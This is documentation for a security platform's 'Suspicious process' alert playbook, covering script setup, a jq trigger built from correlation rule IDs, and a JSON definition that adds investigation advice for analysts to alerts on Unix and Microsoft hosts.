The "Recommendation. Suspicious process" predefined playbook allows you to assess alerts related to suspicious processes and receive an automatically generated recommendation on further actions. It adds a summarized recommendation comment to the alert to support further decisions.
Before using the playbook, you must download the scripts and dependencies list, which are required for playbook to work correctly.
Click here to see how to download and prepare the scripts
playbooks folder, which contains:docs folder, which includes DOCX files describing how the playbooks work;code folder, which includes JSON files with the playbooks definitions;scripts folder, which includes Python scripts requiered for the playbooks to run.api/v3/kuma.kuma_events.py, specify the values of the following constants:HOST — enter the Kaspersky Next XDR Expert FQDN or IP address;TOKEN — enter the API token generated on the previous step.xdr_link_events.py, specify the values of the following constants:HOST — enter the Kaspersky Next XDR Expert server FQDN or IP address;user — enter your user name;password — enter your password.kuma_events.py, xdr_link_events.py and requirements.txt to a directory on a remote client computer.The default script directory is /opt/xdr_scripts. If you choose a different directory for the scripts, you must change the value of the workdir parameter in the Input field in the additional settings of each affected advanced playbook.
requirements.txt and execute the following command to install dependencies:pip install -r requirements.txt
To create a playbook, refer to the "Creating playbooks" article.
Click here to see the full expression that the playbook trigger contains
.OriginalEvents | map(select(.Type == 3)) | map(.ExternalID) - ["R050_01", "R050_04", "R050_05", "R050_07", "R058_03", "R061_01", "R061_03", "R061_05", "R062_01", "R062_03", "R063_01", "R063_03", "R076_05", "R082_01", "R082_02", "R082_09", "R082_12", "R083_01", "R083_03", "R083_05", "R083_07", "R083_09", "R083_10", "R083_13", "R084_01", "R084_02", "R084_04", "R087_04", "R089_05", "R089_07", "R093_03", "R093_14", "R093_18", "R093_31", "R098_01", "R098_02", "R099_01", "R099_02", "R099_03", "R099_04", "R099_05", "R099_07", "R100_01", "R100_03", "R101_01", "R101_03", "R102_02", "R103_02", "R104_01", "R105_01", "R105_02", "R105_03", "R106_02", "R107_02", "R107_03", "R107_04", "R108_02", "R109_02", "R110_04", "R110_05", "R110_06", "R110_07", "R111", "R150_01", "R150_02", "R151", "R152_01", "R152_02", "R152_03", "R152_04", "R152_05", "R152_06", "R152_07", "R152_09", "R152_10", "R152_11", "R152_12", "R152_13", "R154_03", "R154_06", "R154_09", "R211_01", "R220_02", "R220_04", "R220_05", "R220_06", "R221_01", "R221_04", "R222_02", "R222_03", "R222_04", "R223_02", "R223_03", "R224_02", "R224_03", "R224_08", "R224_12", "R224_13", "R224_14", "R224_17", "R224_18", "R224_19", "R224_20", "R224_21", "R225_03", "R225_05", "R226_02", "R226_03", "R227_02", "R228_01", "R228_02", "R229_01", "R230_02", "R231_02", "R231_03", "R231_04", "R232", "R233_01", "R233_04", "R240_01", "R240_02", "R240_05", "R250", "R270", "R280_01", "R280_02", "R280_03", "R280_04", "R282_01", "R282_02", "R283_01", "R283_02", "R283_03", "R285_01", "R285_02", "R286_02", "R287_01", "R287_02", "R288_01", "R288_02", "R288_03", "R289_02", "R290_01", "R290_02", "R290_03", "R290_04", "R290_05", "R290_06", "R290_07", "R290_08", "R290_09", "R291_01", "R291_02", "R291_03", "R291_04", "R291_05", "R291_06", "R292_01", "R292_02", "R293_01", "R293_02", "R293_03", "R293_04", "R294_01", "R294_03", "R294_04", "R295_01", "R295_02", "R296_01", "R296_02", "R296_03", "R296_04", "R296_05", "R296_06", "R296_07", "R296_08", "R296_09", "R296_10", "R296_11", "R296_12", "R296_13", "R296_14", "R296_15", "R296_16", "R296_17", "R296_18", "R296_19", "R296_22", "R297", "R298", "R299", "R300_01", "R300_02", "R300_03", "R300_04", "R301_01", "R301_02", "R302_01", "R302_03", "R320", "R321", "R330", "R350_02", "R350_04", "R350_07", "R410_03", "R411_01", "R412_01", "R414_01", "R415_01", "R418_02", "R419_01", "R419_02", "R419_03", "R419_04", "R422_01", "R423_02", "R423_03", "R427_01", "R427_04", "R432_02", "R436_02", "R438_01", "R438_02", "R441", "R442", "R050_06", "R058_04", "R061_10", "R082_03", "R082_04", "R082_13", "R083_06", "R083_12", "R089_08", "R099_08", "R152_08", "R209_05", "R211_02", "R224_06", "R224_07", "R224_10", "R224_15", "R231_05", "R231_06", "R231_07", "R231_08", "R231_10", "R282_03", "R286_01", "R286_03", "R286_04", "R286_05", "R302_04", "R302_05", "R302_06", "R405_01", "R405_02", "R405_04", "R412_02", "R413_01", "R416_01", "R418_01", "R422_02", "R423_01", "R427_02", "R429_01", "R430_01", "R433_01", "R433_02", "R433_03", "R433_04", "R433_06", "R434_01", "R434_02", "R434_03", "R434_04", "R435_05", "R436_01", "R436_03", "R443"] | length == 0
Functions used by the playbook: addCommentToAlert.
During execution, this playbook adds a comment to the alert with recommendations on how to investigate suspicious activity.
Click here to see the sequence of response actions that the playbook algorithm contains
{
"dslSpecVersion": "1.1.0",
"version": "1",
"actionsSpecVersion": "1",
"executionFlow": [
{
"decision": {
"conditions": [
{
"name": "deviceVendor is Unix",
"condition": "${ [ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .BaseEvents[0] | .DeviceVendor == \"Unix\" }",
"steps": [
{
"action": {
"function": {
"type": "addCommentToAlert",
"params": {
"text": "${ \"Recommendations for investigating suspicious activity within the scope of this alert:\n├ Define the LotL bin name. Check how this binary can be abused by an attacker. \n├── for Windows: https://lolbas-project.github.io/\n├── for Linux: https://gtfobins.github.io/\n├ Analyze command line. Check if any following behavior is met:\n├── Downloading data from a remote resource\n├── Executing with an unexpected command line\n├── Proxying execution through another process\n├── Executing from an unexpected path\n├── Misuse of a legitimate function\n├ Analyze process tree including parent and child processes.\n├ Analyze account activity on the host before and after suspicious process started\n├ Analyze related alerts with the same account, on the same host or associated with the same process or command line.\n├ In order to confirm if suspicious activity was performed by the user legitimacy there is an option to ask the user to provide an explanation using the following template:\n┌──\n│ Hello,\n│ Suspicious activity has been detected using your account:\n│ \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Message) + \"\n│ Since this command has been identified as suspicious. Please confirm the legitimacy of the action with a reply email.\n│ Alert details:\n│ Time: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Timestamp /1000 | strflocaltime(\"%Y-%m-%d %H:%M:%S\")) + \"\n│ Host: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceHostName) + \"\n│ Account: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationUserName) + \"\n│ Process: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationProcessName) + \"\n│ Command: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceCustomString5) + \"\n└──\n\nIf any signs of hostile activity were discovered, create an incident basing on the alert.\" }"
}
},
"onError": "stop"
}
}
]
}
]
}
},
{
"decision": {
"conditions": [
{
"name": "DeviceVendor is Microsoft",
"condition": "${ [ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .BaseEvents[0] | .DeviceVendor == \"Microsoft\" }",
"steps": [
{
"action": {
"function": {
"type": "addCommentToAlert",
"params": {
"text": "${ \"Recommendations for investigating suspicious activity within the scope of this alert:\n├ Define the LotL bin name. Check how this binary can be abused by an attacker. \n├── for Windows: https://lolbas-project.github.io/\n├── for Linux: https://gtfobins.github.io/\n├ Analyze command line. Check if any following behavior is met:\n├── Downloading data from a remote resource\n├── Executing with an unexpected command line\n├── Proxying execution through another process\n├── Executing from an unexpected path\n├── Misuse of a legitimate function\n├ Analyze process tree including parent and child processes.\n├ Analyze account activity on the host before and after suspicious process started\n├ Analyze related alerts with the same account, on the same host or associated with the same process or command line.\n├ In order to confirm if suspicious activity was performed by the user legitimacy there is an option to ask the user to provide an explanation using the following template:\n┌──\n│ Hello,\n│ Suspicious activity has been detected using your account:\n│ \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Message) + \"\n│ Since this command has been identified as suspicious. Please confirm the legitimacy of the action with a reply email.\n│ Alert details:\n│ Time: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .Timestamp /1000 | strflocaltime(\"%Y-%m-%d %H:%M:%S\")) + \"\n│ Host: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceHostName) + \"\n│ Account: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationUserName) + \"\n│ Process: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DestinationProcessName) + \"\n│ Command: \" + ([ alert.OriginalEvents[] | select( .Type == 3 ) ][0] | .DeviceCustomString4) + \"\n└──\n\nIf any signs of hostile activity were discovered, create an incident basing on the alert.\" }"
}
},
"onError": "stop"
}
}
]
}
]
}
}
]
}